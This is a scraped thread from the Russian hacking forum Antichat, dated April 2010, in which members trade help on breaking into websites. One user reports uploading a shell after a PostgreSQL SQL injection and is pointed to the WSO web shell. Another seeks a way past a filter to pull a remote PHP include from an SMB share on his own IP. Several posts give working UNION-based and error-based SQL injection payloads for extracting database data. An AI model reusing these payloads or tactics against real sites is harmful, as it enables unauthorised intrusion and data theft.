Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.04.2010, 01:23
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Pashkela
Это чем?
|
|
|
26.04.2010, 09:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe
|
|
|
|
26.04.2010, 09:53
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Gorev
раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe
http://phppgadmin.sourceforge.net/
|
|
|
|
26.04.2010, 10:26
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Как вариант WSO
|
|
|
|
26.04.2010, 15:23
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от budden
Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);
Или без вариантов?
PS Можно айпи дать напрямую, но http съедается..
Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?
|
|
|
|
26.04.2010, 17:41
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от budden
Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?
почему бы не попробовать?
\\smbserver\share\path\to\winfile.ext
это только для венды
|
|
|
|
26.04.2010, 19:17
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Есть иньекция, но в интересных условиях.
В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное.
Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца.
PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+
PHP код:
MySQL error occured on line 68 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query2..]
PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+
PHP код:
MySQL error occured on line 21 in file index.php.
Error 1222: The used SELECT statements have a different number of columns
Query: [..query1..]
Any ideas?
Последний раз редактировалось Nek1t; 26.04.2010 в 19:25..
|
|
|
|
26.04.2010, 19:40
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Все правильно делаю?
Ошибку не выдает, пишет item not found, т.е. сам скрипт что-то отлавливает и не выводит MySQL'ную ошибку?
PHP код:
index.php?id=-1+union+select+count(*),concat(version(),floor(rand(0)*2)),3,4,5,6,7,8,9,10,11+x+from+users+group+by+x--+
где users - существующая таблица. |
|
|
|
26.04.2010, 20:00
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
tak probuy
http://site.com/index.php?cat=(select*from(select+name_const(versi on(),1),name_const(version(),1))a)
|
|
|
|
26.04.2010, 20:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Ctacok
Вывод ошибок есть.
PHP код:
http://site.com/index.php?cat=-1+select count(*),concat(version(),floor(rand(0)*2)) x from table group by x;
капец просто 
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
